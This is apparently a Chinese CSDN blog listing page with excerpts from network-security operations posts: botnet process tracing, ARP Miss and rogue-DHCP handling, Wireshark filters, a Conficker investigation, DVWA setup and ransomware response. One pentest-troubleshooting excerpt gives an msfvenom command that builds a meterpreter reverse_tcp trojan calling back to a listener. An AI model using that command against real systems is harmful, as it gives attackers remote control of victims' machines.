LION-WHY-CSDN博客

原创企业网络安全资质一览表

针对有安全服务业务的公司，在招投标中经常会遇到企业安全资质相关门槛，以下为常见的有以下四个机构颁发的21个网络安全相关的资质，仅供参考。

2022-06-28 23:19:07 2091 1

原创等级保护三级测评要求表

信息安全技术-网络安全等级保护三级测评要求梳理针对等保三级测评要求进行梳理，形成控制域、控制点、测评要求、测评对象、测评实施表格，帮助测评人员、企业安全人员对照梳理偏离表：表格下载地址等保1-4级测评要求请关注后续。...

2021-12-24 10:03:56 5121 2

linux抓取僵尸网络进程脚本安全运维过程中经常会发现安全设备防火墙或IPS有僵尸网络攻击告警，直接阻断很可能影响业务，很多时候需要到源ip主机上溯源。以下编写shell脚本，记录访问目的ip的进程，根据进程由业务人员查看是否为正常业务，进一步做研判。#!/bin/bashread -t 30 -p "请输入僵尸网络IP:" IP_botnetcmd_results=`netstat -anp | grep "$IP_botnet"`while [ -z "$cmd_results" ] do

2021-11-24 18:00:22 3203

原创华为交换机抓包上传至PC分析

华为交换机抓包上传至PC1 登录交换机配置ftp[HW_7703_A]ftp server enable[HW_7703_A]aaa[HW_7703_A-aaa]local-user ftpuser password cipher ftpuserinfo: A new user added[HW_7703_A-aaa]local-user ftpuser privilege level 15 ftp-directory cfcard:[HW_7703_A-aaa]local-user ftpu

2021-09-08 10:11:41 1375

原创 ARP Miss攻击处置

1 ARP介绍2 ARP MISS攻击发现查看ARP Miss数量系统视图查看攻击源：displayarp anti-attack arpmiss-record-info3 ARP MISS攻击处置a 调整arp-miss的cpcar值来缓解CPU过高问题b 提高arp表老化时间(默认时间：5s)接口视图：arp-fake expire-time 30c 降低基于源ip限制arp包发送速率arp-miss speed-limit sourc

2021-08-11 17:58:59 4679

原创渗透测试/应急演练过程中metasploit制作木马连接失败问题排查

声明：本文仅供学习交流，恶意人员请绕路，msf木马制作网上有很多教程，比较简单，大致说下步骤：1 生成木马在kali控制台输入： msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.10 LPORT=4444 -f exe >/home/kali/111.exe-p 参数后跟上payload（载体），攻击成功之后，要做什么事情LHOST 后跟监听的IP,kali的ipLPORT 后跟监听

2021-07-07 19:26:55 2875

原创企业网络信息安全意识宣贯——屏保制作

企业网络信息安全意识宣贯——屏保制作屏保程序的设置对企业信息安全的工作来说非常重要，可以有效防止人为的非授权访问。屏保程序也可以作为信息安全意识宣贯的重要途径。下边介绍屏保程序制作过程。1、制作宣传PPT此步骤结合自己单位的需要，制作相关的PPT，可以加入信息安全常识、企业愿景、文化等元素等。2、将PPT另存为.webm文件3、将.webm文件转换为.wmv视频文件这里用到在线转换工具：在线转换工具4、制作屏保程序.scr4.1 下载安装Screensaver Factory 64.2

2021-06-11 18:30:29 1267

原创基于wireshark快速定位内网DHCP Server仿冒攻击

基于wireshark快速定位内网DHCP Server仿冒攻击：子公司网络负责人反馈本部员工DHCP分配到的ip为非法ip，请求定位DHCP server攻击原理：由于DHCP发现报文（DHCP DISCOVER）以广播形式发送，所以DHCP Server仿冒者可以侦听到此报文。DHCP Server仿冒者回应给DHCP Client仿冒信息，如错误的ip地址快速定位：在获取到异常ip的主机上，开启wireshark抓包，基于DHCP报文交互特性，显示过滤输入条件：ip.addr == 25

2021-01-26 11:36:03 457

原创 wireshark过滤使用及常见网络攻击检测过滤

1、wireshark过滤方法：抓包过滤和显示过滤1、抓包过滤：设置抓包条件，只抓取符合条件的报文模块功能及使用介绍：1、选择抓包接口（选取网卡）2、抓包过滤条件：（须知：五元组（元素）确定一条流量） 5个元素：源目ip、源目port、协议。 3个逻辑符：与、或、非可填写：tcpudphost 192.

2020-12-30 16:50:57 1212 2

原创 HCIE-Security心得

HCIE-Security心得致敬：首先在此致敬所有问鼎专家级认证的战友们！奋斗的路上不孤独。其次声明本人不为任何机构所托，只是分享在自己通往CSO路程的一个历程记录与心得。考证背景本人是一名17级硕士毕业生，毕业后因为学校特殊性及专业名气，找工作还算顺利，进入了国企福利待遇都不错。然而官场氛围太严重，加上自己刚入社会傲气傲骨并存，年轻气盛导致各种不顺心。19年元旦过后果断裸辞，自掏腰包参加了网络信息安全行业敲门砖CISP培训，因为职业规划，选了CISP的CISO（管理方向）。空挡期实属难熬，

2020-12-29 18:09:00 2442 1

原创飞客蠕虫病毒？分析、定位、处理

飞客蠕虫病毒？分析、定位、处理一、防火墙发现告警近期同一部门两个同事的电脑都有该告警。目的ip：104.18.120.91、104.18.119.91。虽然该部门不能上外网，出于严谨还是决定一探究竟。初步分析：百度查询该ip信息得知为美国ip，53端口为dns服务器所开放，主要用于域名解析。应该是某进程访问某一网址去该目的ip请求域名解析。微步在线先看下该ip情况：未发现目的有异常。...

2020-12-29 17:42:07 1462 1

原创 DVWA搭建中遇到的无法连接数据库问题及处理

@DVWA搭建中遇到的坑TOC#DVWA搭建中遇到的坑DVWA搭建教程网上有很多：如：DVWA的搭建1.下载phpStudyhttp://phpstudy.php.cn/phpStudy是集成了Apache和MySql的集成环境，下载好安装phpStudy,运行时若显示缺少VC运行库32位的VC9：http://www.microsoft.com/zh-CN/download/details.aspx?id=558264位的VC9：http://www.microsoft.com/zh-

2020-07-24 16:03:24 13133 3

原创记一次勒索病毒攻击事件的处理过程

记一次勒索病毒攻击事件的处理过程记一次勒索病毒攻击事件的处理过程11时13分收到同事反馈，其电脑防病毒软件检测到勒索病毒或变种的攻击事件，攻击源：192.168.111.222告知被攻击用户动作紧急关闭445端口查找攻击源使用人根据IP-MAC记录表及上网行为管理AC上用户管理-IP-MAC绑定未查到攻击源ip。确定该用户为研发人员，禁止上网利用nmap查看攻击源信息发现主机名...

2019-08-02 17:38:53 2396